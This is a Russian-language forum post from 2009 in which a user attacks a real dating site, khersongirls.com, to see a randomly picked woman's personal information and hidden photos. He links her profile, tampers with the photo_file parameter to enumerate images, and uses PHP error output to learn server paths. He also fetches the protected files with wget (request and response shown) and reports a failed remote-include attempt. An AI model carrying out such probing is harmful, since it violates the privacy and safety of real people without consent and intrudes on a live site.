Цитата:
Сообщение от ustas
честно, не интересно
интересней почитать как уводят у других
и ты правильно заметил что тут будет сплошной копипаст, т.к. никто не занимается ресерчем уязвимостей, что вполне логично и естественно
|
ну вот чтобы не было копипаста - возмём для експеримента сайт херсонгёрлз
цель - посмотреть личную инфу
для експеримента выбираем жертву
http://www.khersongirls.com/php/detail.php?site=4698
для начала хотим получить фотки (на анкете их одна, на самом деле их больше)
такс -смотрим на ссылку на фотку
Код:
http://www.khersongirls.com/php/photo.php?subcatalog=20&photo_file=2534x4698x34719.jpeg&agent_domain=khersongirls.com
смотрим чё за аргументы
subcatalog=20 - папка с фоткой
photo_file=2534x4698x34719.jpeg - страное имя файла. как оказалась первое число - номер анкеты, второе - внутрений номер в базе (он же номер страницы), а вот 35303 - хм. как оказалось номер фотки с фотика. пробуем поменять - опа, пошли фотки. но надо как-то забрать оригинали а не то что отдаёт скрип
последнее agent_domain=khersongirls.com - подпись под фоткой
ладно - вернёмся к изменению фото_файл
ошиблись в значении - опа, ошибка в пхп скрипте
Код:
Warning: getimagesize: Unable to open '/home/k/h/khersongirls.com/html//php/files/photos/20/2534x4698x3471.jpeg' for reading. in /home/k/h/khersongirls.com/html/php/photo.php on line 15
Warning: imagecreatefromjpeg: Unable to open '/home/k/h/khersongirls.com/html//php/files/photos/20/2534x4698x3471.jpeg' for reading in /home/k/h/khersongirls.com/html/php/photo.php on line 24
Warning: Supplied argument is not a valid Image resource in /home/k/h/khersongirls.com/html/php/photo.php on line 31
Warning: Cannot add header information - headers already sent by (output started at /home/k/h/khersongirls.com/html/php/photo.php:15) in /home/k/h/khersongirls.com/html/php/photo.php on line 34
Warning: Supplied argument is not a valid Image resource in /home/k/h/khersongirls.com/html/php/photo.php on line 38
подозрения свершились
значит
Код:
http://www.khersongirls.com/php/photo.php?subcatalog=20&photo_file=2534x4698x34719.jpeg&agent_domain=khersongirls.com
берёт файл с
Код:
khersongirls.com/php/files/photos/20/2534x4698x34719.jpeg
- а вот нет, как оказалась файлы там защищены и редирект
Код:
GET /php/files/photos/20/2534x4698x34719.jpeg HTTP/1.0
User-Agent: Wget/1.11.4
Accept: */*
Host: khersongirls.com
Connection: Keep-Alive
---request end---
Запрос HTTP послан, ожидание ответа...
---response begin---
HTTP/1.1 302 Found
Date: Sat, 08 Aug 2009 17:16:20 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.1.2 FrontPage/5.0.2.2510
Location: http://www.khersongirls.com/index.htm
Connection: close
Content-Type: text/html; charset=iso-8859-1
---response end---
302 Found
Адрес: http://www.khersongirls.com/index.htm [переход]
вот покамись на этом остановился. у кого есть идеи как получить оригинал?
ПОВТОРЯЮ - ПРОФИЛЬ ЖЕРТВЫ ВЫБРАН В СЛУЧАЙНОМ ПОРЯДКЕ. ничего лично, это придено для примера
pingwinator добавил 08.08.2009 в 20:17
кстати, класический приём с
Цитата:
http://www.khersongirls.com/php/help...p://google.com
|
несработал :(
было бы весело если бы даные не инклудились с папки help/